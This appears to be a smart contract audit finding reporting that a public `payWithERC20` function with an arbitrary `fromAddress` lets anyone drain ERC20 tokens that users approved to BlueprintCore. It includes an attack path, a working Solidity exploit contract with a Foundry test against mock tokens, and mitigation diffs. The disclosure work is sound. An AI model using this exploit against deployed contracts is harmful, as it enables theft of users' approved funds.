Eager Paisley Mole

High

# Attacker Will Drain Approved Tokens from Users via `Payment::payWithERC20` Direct Calls

### Summary

The public visibility and arbitrary `fromAddress` in the `payWithERC20` function will cause a potential loss of funds for users who have approved the `BlueprintCore` contract as an attacker will directly call `payWithERC20` to transfer approved tokens to an address they control.

### Root Cause

https://github.com/sherlock-audit/2025-03-crestal-network/blob/27a3c28155702b3a68f29347efedffb048010e33/crestal-omni-contracts/src/Payment.sol#L25-L32

In `Payment.sol:22-30`, the `payWithERC20` function is marked as `public` and allows an arbitrary `fromAddress` without restricting it to `msg.sender`. This design choice enables anyone to call the function and transfer tokens from any address that has approved the `BlueprintCore` contract, bypassing the intended internal usage within `BlueprintCore`.

### Internal Pre-conditions

1. A user needs to approve the `BlueprintCore` contract to spend an amount of ERC20 tokens (e.g., via `approve(BlueprintCoreAddress, amount)`) on their behalf.
2. The `erc20TokenAddress` must be a valid ERC20 token contract supported by `BlueprintCore` (e.g., listed in `paymentAddressEnableMp` for other operations, though not checked in `payWithERC20` itself).

### External Pre-conditions

None

### Attack Path

1. A user approves the `BlueprintCore` contract to spend 1000 tokens of an ERC20 token (e.g., `token.approve(BlueprintCoreAddress, 1000e18)`).
2. An attacker calls `payWithERC20(erc20TokenAddress, 500e18, userAddress, attackerAddress)` directly on the `BlueprintCore` contract.
3. The `safeTransferFrom` function transfers 500 tokens from `userAddress` to `attackerAddress`, assuming the approval is still valid.
4. The attacker repeats this process until the approved amount is exhausted or the approval is revoked.

### Impact

The affected users suffer an approximate loss of the total value of ERC20 tokens they’ve approved for the `BlueprintCore` contract to spend. The attacker gains these tokens directly, proportional to the approved amounts they can exploit.

### PoC

Add this contract within `BlueprintV5.t.sol` for the exploit logic

<details>
<summary>Exploit Contract</summary>

```solidity
contract Exploit {
    BlueprintV5 public blueprint;
    MockERC20 public token;

    constructor(address _blueprint, address _token) {
        blueprint = BlueprintV5(_blueprint);
        token = MockERC20(_token);
    }

    function attack(address victim, uint256 amount) external {
        blueprint.payWithERC20(address(token), amount, victim, address(this));
        // Attacker now has the tokens transferred from the victim
    }

    function checkStolenFunds() external view returns (uint256) {
        return token.balanceOf(address(this));
    }
}
```

</details>

Add test function to contract BlueprintTest contract

<details>
<summary>Attack Test Function</summary>

```solidity
function test_exploitPayWithERC20() public {
    // Setup: Add payment address and mint tokens
    uint256 victimAmount = 500 ether;
    blueprint.addPaymentAddress(address(mockToken));
    mockToken.mint(address(this), victimAmount);

    // Victim approves BlueprintV5 to spend their tokens
    mockToken.approve(address(blueprint), victimAmount);
    uint256 allowance = mockToken.allowance(address(this), address(blueprint));
    assertEq(allowance, victimAmount, "Blueprint should have correct allowance");

    // Deploy the exploit contract
    Exploit attacker = new Exploit(address(blueprint), address(mockToken));

    // Initial balances
    uint256 victimInitialBalance = mockToken.balanceOf(address(this));
    assertEq(victimInitialBalance, victimAmount, "Victim should have initial balance");

    // Attacker exploits by calling payWithERC20 directly
    uint256 stealAmount = 200 ether;
    attacker.attack(address(this), stealAmount);

    // Verify the exploit
    uint256 victimFinalBalance = mockToken.balanceOf(address(this));
    uint256 attackerBalance = mockToken.balanceOf(address(attacker));
    assertEq(victimFinalBalance, victimAmount - stealAmount, "Victim balance should decrease");
    assertEq(attackerBalance, stealAmount, "Attacker should have stolen tokens");

    // Log for debugging
    console.log("Victim initial balance:", victimInitialBalance);
    console.log("Victim final balance:", victimFinalBalance);
    console.log("Attacker balance:", attackerBalance);
}
```

</details>


1. Deploy MockERC20 and MockBlueprintCore.
2. The PoC contract approves MockBlueprintCore to spend 500 tokens.
3. The Exploit contract calls payWithERC20 to transfer 200 tokens from the PoC contract to itself.
4. Assertions verify the attacker received the tokens, exploiting the public function.

### Mitigation

**1. Restrict Visibility:**
- Change `payWithERC20` to `internal` or `private` so it can only be called within `BlueprintCore` or `Payment`. This ensures it’s only used as intended by internal logic.

```diff

--    function payWithERC20(address erc20TokenAddress, uint256 amount, address fromAddress, address toAddress) public {
++    function payWithERC20(address erc20TokenAddress, uint256 amount, address fromAddress, address toAddress) internal {
        // check from and to address
        require(fromAddress != toAddress, "Cannot transfer to self address");
        require(toAddress != address(0), "Invalid to address");
        require(amount > 0, "Amount must be greater than 0");
        IERC20 token = IERC20(erc20TokenAddress);
        token.safeTransferFrom(fromAddress, toAddress, amount);
    }

```

Alternatively
**2. Restrict fromAddress to msg.sender:**
- Add a check to ensure `fromAddress == msg.sender`, preventing arbitrary `fromAddress` usage. This aligns with typical ERC20 transfer patterns and eliminates the exploit.

```diff
function payWithERC20(address erc20TokenAddress, uint256 amount, address fromAddress, address toAddress) public {
++    require(fromAddress == msg.sender, "Only sender can transfer their own tokens");
    require(fromAddress != toAddress, "Cannot transfer to self address");
    require(toAddress != address(0), "Invalid to address");
    require(amount > 0, "Amount must be greater than 0");
    IERC20 token = IERC20(erc20TokenAddress);
    token.safeTransferFrom(fromAddress, toAddress, amount);
}
```